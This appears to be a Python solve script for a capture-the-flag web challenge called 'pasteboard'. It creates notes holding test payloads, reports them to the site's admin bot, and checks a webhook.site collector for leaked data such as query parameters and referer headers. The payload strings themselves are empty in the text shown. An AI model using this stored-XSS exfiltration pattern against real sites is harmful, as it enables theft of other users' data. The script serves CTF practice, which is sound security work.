import requests
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"
# Test 1: Can we even get static data in URL params?
test1 = '''
'''
# Test 2: Use referer which we already know is sent
test2 = '''
'''
# Test 3: Try to use the loaded script to do a second fetch
test3 = '''
'''
tests = [
("Test 1: Static params", test1),
("Test 2: Check referer", test2),
("Test 3: data URI fetch", test3),
]
print("[*] Testing simpler data exfiltration...")
print()
created = []
for name, payload in tests:
session = requests.Session()
resp = session.post(
BASE_URL + "/note/new",
data={"title": name, "body": payload},
allow_redirects=False
)
if resp.status_code == 302:
location = resp.headers.get('Location')
note_url = BASE_URL + location
print(f"[*] {name}")
print(f" {note_url}")
report = session.post(BASE_URL + "/report", data={"url": location})
if report.status_code == 202:
print(f" ✓ Reported")
created.append(name)
print()
print("="*70)
print("[*] Check webhook in 40 seconds")
print("[*] Look for:")
print(" - /test1.js?data=STATIC_TEST")
print(" - /test2.js (check referer header)")
print(" - /test3.js?title=...")
print()
print(" https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")